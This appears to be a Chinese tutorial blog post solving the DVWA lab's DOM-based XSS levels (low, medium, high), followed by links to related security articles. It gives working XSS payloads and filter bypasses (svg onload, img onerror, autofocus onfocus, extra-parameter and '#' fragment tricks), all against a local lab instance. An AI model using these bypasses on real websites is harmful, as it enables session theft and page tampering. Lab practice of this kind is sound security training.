【dvwa靶场:XSS系列】XSS (DOM) 低-中-高级别,通关啦

一、低级low

拼接的url样式:​​​​​​​

http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default= 拼接的新内容

<script>alert("假客套")</script>

二、中级middle

拼接的url样式:​​​​​​​
http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default= 拼接的新内容

过滤了script,使用其他标签拼接新的,新的拼接如下四选一

</select><svg onload=alert('假客套');>

</select><img src=x onerror=alert("假客套")>

注意这里的autofocus会一直自动加载弹窗,不加无效

<select><input onfocus = alert('假客套') autofocus/>

"><input onfocus = alert('假客套') autofocus/>

三、高级high

拼接的url样式:

​​​​​​​http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=English 拼接的新内容

过滤了script,使用其他标签拼接新的,新的拼接如下二选一

自定义一个参数名,拼接假的采纳数传递过去,比如不存在的name

&name=<script>alert("假客套")</script>

# 注释掉后续不传给后端,也不过滤

#<script>alert("假客套")</script>
相关推荐
恃宠而骄的佩奇1 小时前
i春秋-签到题
web安全·网络安全·蓝桥杯
follycat1 小时前
信息收集--CDN绕过
网络·安全·网络安全
清风.春不晚4 小时前
shell脚本2---清风
网络·网络安全
Wh1teR0se15 小时前
[极客大挑战 2019]Secret File--详细解析
前端·web安全·网络安全
网安_秋刀鱼20 小时前
PHP代码审计 --MVC模型开发框架&rce示例
开发语言·web安全·网络安全·php·mvc·1024程序员节
假客套1 天前
vulfocus在线靶场:CVE_2019_16662 速通手册
网络安全·web渗透·vulfocus在线靶场
y0ungsheep1 天前
[第五空间 2021]pklovecloud 详细题解
web安全·网络安全·php
儒道易行1 天前
【Pikachu】SSRF(Server-Side Request Forgery)服务器端请求伪造实战
网络安全
九尾w1 天前
phpMyAdmin/PHP反序列化/sqli-labs/upload/pikachu/DVWA--靶场搭建--超详细教程!!!
网络安全·php